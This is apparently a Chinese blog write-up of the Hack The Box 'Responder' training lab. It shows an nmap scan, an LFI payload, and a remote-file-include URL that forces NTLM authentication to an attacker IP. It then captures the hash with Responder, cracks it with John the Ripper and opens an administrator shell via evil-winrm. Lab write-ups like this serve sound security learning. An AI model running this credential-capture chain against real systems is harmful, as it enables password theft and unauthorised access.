Hack The Box Starting Point 渗透测试入门靶场 TIER 1 - Responder

涉及到SMB,枚举,Apache和WinRM(WinRM是Windows Remote Managementd(win远程管理)的简称。基于Web服务管理(WS-Management)标准,使用80或443端口。这样我们就可以在对方有设置防火墙的情况下远程管理这台服务器)
在这里插入图片描述

先看一下旁边的Walkthough,看看本靶场的要求
本实验重点介绍如何利用 Windows 机器上提供的网页上的文件包含漏洞来收集运行 Web 服务器的用户的 NetNTLMv2 质询。我们将使用一个名为 Responder 的实用程序来捕获 NetNTLMv2 哈希,然后使用一个称为 john the ripper 的实用程序来测试数百万个潜在密码,看看它们是否与用于创建哈希的密码匹配。我们还将深入研究 NTLM 身份验证的工作过程以及响应程序实用程序如何捕获挑战。
TASK 1,开放了多少TCP端口?答案是3。
在这里插入图片描述

使用nmap扫描,-p-:所有端口,-min-rate:最低速率
nmap -v -p- -min-rate 3000 -sV -sC 10.129.203.29,扫出了80,5980和7680端口。
在这里插入图片描述

TASK 2,使用 IP 地址访问 Web 服务时,我们被重定向到的域是什么?unika.htb
在这里插入图片描述

我们直接访问ip会显示无法建立到unika.htb服务器的链接
在这里插入图片描述

我们使用echo命令绑定一下host(tee命令用于读取标准输入的数据,将内容输出成文件,-a/–append:附加到既有文件的后面,而非覆盖它)
echo “10.129.203.29 unika.htb” | sudo tee -a /etc/hosts
在这里插入图片描述

TASK 3,服务器上哪种脚本语言被用来生成网页?php
在这里插入图片描述

TASK 4,用于加载不同语言版本网页的 URL 参数的名称是什么?page
在这里插入图片描述

当我们将语言改为FR的时候,URL参数为page=french.html
在这里插入图片描述

TASK 5,哪个page参数的值可能存在本地文件包含(LFI),这里很明显本地文件包含是…/…/…/…/…/…/…/…/windows/system32/drivers/etc/hosts
在这里插入图片描述

目前已知的参数只有page,用page测一下是否存在文件包含,这里就爆出了/etc/hosts的内容
在这里插入图片描述

TASK 6,远程文件包含(RFI)是哪个?答案是//10.10.14.6/somefile,远程包含目标IP下的文件。
在这里插入图片描述

TASK 7,NTLM是什么?NTLM(New Technology Lan Manager),NTLM是一种基于挑战(challenge)/响应(response)消息交互模式的认证过程。
在这里插入图片描述

TASK 8,使用Responder去指定网络接口。kali自带的responder,–help查看使用,这里可以看到-I是指定网络接口。
在这里插入图片描述
在这里插入图片描述
使用responder创建一个恶意的SMB服务器,当目标机器尝试对该服务器执行 NTLM 身份验证时,响应程序会向服务器发送回一个质询,以使用用户密码进行加密。当服务器响应时,Responder 将使用质询和加密响应来生成 NetNTLMv2。虽然我们无法逆向 NetNTLMv2,但我们可以尝试许多不同的常用密码,看看是否有任何生成相同的质询响应,如果找到,我们就知道那是密码(可以使用Jhon the Ripper工具)。
sudo responder -I tun0
在这里插入图片描述

浏览器通过page远程包含,访问我们tun0网卡,
http://unika.htb/index.php?page=//10.10.16.133/somefile,捕获到对应的hash值
在这里插入图片描述

TASK 9,有几种工具可以接受 NetNTLMv2 质询/响应并尝试数百万个密码,以查看其中是否有任何一个生成相同的响应。 一种这样的工具通常被称为“john”,但全名是什么?John the Ripper
在这里插入图片描述

TASK 10,administrator的密码是什么?
在这里插入图片描述

使用John the Ripper破解
首先将刚才的Hash存到文件中,echo “hash” > hash.txt
破解john -w=/usr/share/wordlists/rockyou.txt hash.txt(-w:使用字典)
得到administrator密码badminton
在这里插入图片描述

TASK 11,我们将使用 Windows 服务使用我们恢复的密码远程访问 Responder 机器。它侦听的 TCP 端口是什么?5985端口。
在这里插入图片描述

再来看一下我们nmap扫描到的端口
在这里插入图片描述

最后来获取flag,我们将连接到目标上的 WinRM 服务并尝试获取会话(默认情况下Linux没有安装PowerShell)。
-i:指定ip,-u:指定用户名,-p:指定密码
evil-winrm -i 10.129.203.29 -u administrator -p badminton
进入shell
在这里插入图片描述

在C:\Users\mike\Desktop下找到了flag,用type命令打印出来。
在这里插入图片描述

  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值